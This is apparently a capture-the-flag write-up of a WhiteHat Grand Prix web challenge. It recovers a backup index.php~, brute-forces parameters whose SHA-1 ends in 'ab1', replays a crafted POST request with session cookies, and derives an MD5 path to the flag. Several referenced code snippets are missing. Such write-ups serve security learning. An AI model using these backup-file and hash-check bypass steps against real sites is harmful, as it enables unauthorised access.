This is a web challenge worth 100 points. I’ve been in the South for a while, and all my friends are working throughout the week. It’s only on my day off that I coincidentally found this competition. So, when writing this write-up, I did it a bit hastily to get some sleep =)) If I have time, I’ll revise the text for you all.
URL: http://ssi.grandprix.whitehatvn.com/ (main) http://bak.ssi.grandprix.whitehatvn.com/ (backup)
I didn’t find anything unusual in the source code. When checking the backup file (index.php~), I found the following snippet:
It means that the parameter passed will have an additional ‘secret’ instead of just ‘textColor’ as we initially checked with Burp Suite. But what we need to focus on is line 16. To enter this case, we need to ensure that the SHA-1 hash of ‘secret’ and ‘textColor’ (concatenated together) has the last 3 characters as ‘ab1’.
The Java code is quite lengthy; you should use Python for speed.
So, you’ve got some numbers, and if you use the first one, you’ll get the URL as follows:
http://ssi.grandprix.whitehatvn.com/index.php?secret=18&textColor=28&submit=Change
At this point, you can directly edit the request as follows:
POST /index.php HTTP/1.1
Host: ssi.grandprix.whitehatvn.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:58.0) Gecko/20100101 Firefox/58.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://ssi.grandprix.whitehatvn.com/index.php?secret=23&textColor=78&submit=Change
Content-Type: application/x-www-form-urlencoded
Content-Length: 22
Cookie: PHPSESSID=ovbq9nm15sasgbn05gtdkn5b40; WH-grandprix=SSBsb3ZlIHdoaXRlaGF0
Connection: close
Upgrade-Insecure-Requests: 1secret=23&textColor=78
I also don’t understand why Firefox can redirect while Chrome remains still. You were redirected to ‘showip.php’, and after the redirection, the cookie is recorded, so you can’t go back to ‘index.php’ anymore.
Go to ‘result.shtml’ to display the results.
The source code for ‘showip.php’:
The top line, which is equivalent to the console log and explicitly written, looks like this:
Debug Objects: Flag at directory: value_special/flag.txt’ );
</script>
<script>
console.log( ‘Debug Objects: value_special = md5(filesize(index.php)-namechannelIRC)’ );
</script>
<script>
console.log( ‘Debug Objects: — is a character’ );
It means we will have to find the ‘value_special,’ and the additional information about ‘value_special’ from the question is:
value_special = md5(filesize(index.php)-namechannelIRC)
“-” is a character=>> IRC channel: #whitehatgrandprix2017 and the ‘-’ sign is not a subtraction sign
The remaining part is to apply the formula above:
MD5 hash:
1.6K-#whitehatgrandprix2017 => 36789f5cc2688fb98476eea77c6696fe
Flag URL: http://ssi.grandprix.whitehatvn.com/36789f5cc2688fb98476eea77c6696fe/flag.txt
Learn_form_yesterday.Live_for_today.Hope_for_tomorrow.
Hash the resulting string and insert it to match the correct flag format: